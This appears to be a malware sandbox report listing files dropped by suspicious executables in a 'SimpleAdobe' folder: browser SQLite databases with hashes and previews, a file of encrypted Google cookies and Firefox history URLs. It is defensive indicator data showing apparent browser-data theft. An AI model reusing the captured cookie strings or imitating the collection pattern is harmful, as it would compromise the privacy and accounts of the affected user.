                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):5242880
                                          Entropy (8bit):0.03859996294213402
                                          Encrypted:false
                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):155648
                                          Entropy (8bit):0.5407252242845243
                                          Encrypted:false
                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):159744
                                          Entropy (8bit):0.5394293526345721
                                          Encrypted:false
                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):5242880
                                          Entropy (8bit):0.03859996294213402
                                          Encrypted:false
                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.6732424250451717
                                          Encrypted:false
                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):155648
                                          Entropy (8bit):0.5407252242845243
                                          Encrypted:false
                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):159744
                                          Entropy (8bit):0.5394293526345721
                                          Encrypted:false
                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.8439810553697228
                                          Encrypted:false
                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):51200
                                          Entropy (8bit):0.8746135976761988
                                          Encrypted:false
                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):530
                                          Entropy (8bit):5.999391385907715
                                          Encrypted:false
                                          SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                          MD5:06ED2CD304730F55A5C7001509E128BE
                                          SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                          SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                          SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):112
                                          Entropy (8bit):4.9113057226932435
                                          Encrypted:false
                                          SSDEEP:3:N8DSLvIJiMgTE2WdkQVjDSLvIJiMhKVX3L2WdkQVQ:2OLciodFOLciA8dq
                                          MD5:0CE7E561D96623E70DD177304D3B56DA
                                          SHA1:27B4131817E71657AED90C086E01E7E925BF641E
                                          SHA-256:E0B2F92CFB58B7D5EDFBB1FDF3E81194D4E55A90706986C389BDF21D2AD2325D
                                          SHA-512:48154E76523305BBB7ED39FEAD22CB4DD6FDD568259DC8D0E70ABA4A21030DAF6D1274E0DC5D7F10DFCF7B3B61BD2401FFB4768F301AEF04F142AF23EF335AB5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:https://www.mozilla.org/privacy/firefox/.1696426831..https://www.mozilla.org/en-US/privacy/firefox/.1696426831..
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:ASCII text, with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):6649
                                          Entropy (8bit):5.402315317668985
                                          Encrypted:false
                                          SSDEEP:96:xzwyORMNWc2KBhA6tsxODsAQdfWiho1RXjuWWANUbg3x:xmOWX6tsxPAQdf5hwuUB
                                          MD5:DB48D5A1C1A5375BDBAFB27FD6C92EAB
                                          SHA1:808EDD2554C183DB8D8A2240F43F8ECC2039A769
                                          SHA-256:02ED9ECFAF2F1D0E0D815B9FF2DCF5C8D0B4BF5DE3C53543DDECD9FDAD8B3D36
                                          SHA-512:38D8D294DEE75D587AE12373EA4432B1F87D6576B96B28D6616149570770E100D434A207F21D9CACBFBA10513D5099C836AA4A63A1CE5594DF4111FE02E95360
                                          Malicious:false
                                          Reputation:unknown
